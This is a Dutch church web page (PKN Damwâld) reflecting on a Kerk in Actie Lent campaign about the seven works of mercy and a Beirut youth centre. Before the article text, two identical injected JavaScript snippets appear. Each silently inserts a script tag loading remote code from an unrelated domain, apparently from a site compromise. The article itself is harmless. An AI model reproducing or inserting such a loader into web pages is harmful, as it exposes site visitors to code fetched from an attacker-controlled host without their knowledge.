;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Terugkijken op Vastenactie Veertigdagentijd "Alles komt goed?!" - PKN Damwâld

Terugkijken op Vastenactie Veertigdagentijd “Alles komt goed?!”

Gepubliceerd op: dinsdag 19 april 2022

De vastenactie Veertigdagentijd, een initiatief van Kerk in Actie, werd een inspirerende ‘wandeling’ op weg naar Pasen, dit aan de hand van de ‘zeven werken van barmhartigheid’. In onze christelijke traditie kennen we verschillende wijzen om onze gedachten over onze relatie met God en met elkaar te ordenen. Zoals ons werken aan de zeven werken van barmhartigheid. De zeven werken van barmhartigheid zijn ontleend aan Matteüs 25:31-46. Filosoof en kerkvader Augustinus verbond deze werken van barmhartigheid met elkaar en is een appėl tot naastenliefde . Jezus zegt namelijk “Alles wat jullie gedaan hebben voor een van de onaanzienlijksten van mijn broeders of zusters, dat hebben jullie voor mij gedaan” (Matteüs 25, 40; NBV). Jezus is heel concreet over de ‘werken’: “Want Ik had honger en jullie hebben Me te eten gegeven, Ik had dorst en jullie hebben Me te drinken gegeven, Ik was vreemdeling en jullie hebben Me opgenomen. Ik was naakt en jullie hebben Me gekleed, Ik was ziek en jullie hebben naar Me omgezien, Ik zat in de gevangenis en jullie kwamen naar Me toe.” (Matteüs 25, 35-36).

Tijdens de diensten in de afgelopen 7 weken werden deze werken, dankzij een enthousiaste voorbereidingscommissie, op inspirerende wijze voor het voetlicht gebracht: de hongerigen te eten geven, de dorstigen te drinken geven, de naakten kleden, de vreemdelingen herbergen, de zieken bezoeken, de gevangenen bezoeken en de doden begaven

De Veertigdagentijd begint telkens op Aswoensdag en loopt tot Pasen. Van oudsher is dit een tijd van inkeer, bezinning en gebed. Ook dit jaar stonden we stil bij het lijden van Jezus én bij het lijden van onze naasten, dichtbij en ver weg. Door te vasten tijdens deze periode bereid je je bewust voor op het feest van Pasen: het feest van God die zichzelf steeds opnieuw aan ons wil schenken. Vasten schept ruimte voor verlangen naar het grote feest. Vasten kan op verschillende manieren. Sommige mensen kiezen voor het tijdelijk afzien van alcohol, vlees en/of snoep. Anderen kiezen er bijvoorbeeld voor tijdelijk geen Netflix te kijken of sociale media te gebruiken. Op de vastenkaart van Kerk in Actie stond elke week een andere vastensuggestie, waaronder ook tips voor dingen die je in de vastentijd juist extra kunt doen, zoals iemand een kaart sturen, een compliment geven, of voor iemand bidden.

Kerk in Actie steunt met deze vastenactie het werk van jongerencentrum Manara in Beiroet. Kwetsbare tieners krijgen er huiswerkbegeleiding, psychosociale hulp en vaktrainingen voor betere kansen op de arbeidsmarkt. Daarnaast kunnen ze elkaar in ontspannen sfeer ontmoeten tijdens een partijtje tafelvoetbal of air hockey. Gelukkig zijn er nog altijd veel mensen bereid in actie te komen voor een ander, zodat ook deze jongeren mogen weten: Alles komt goed!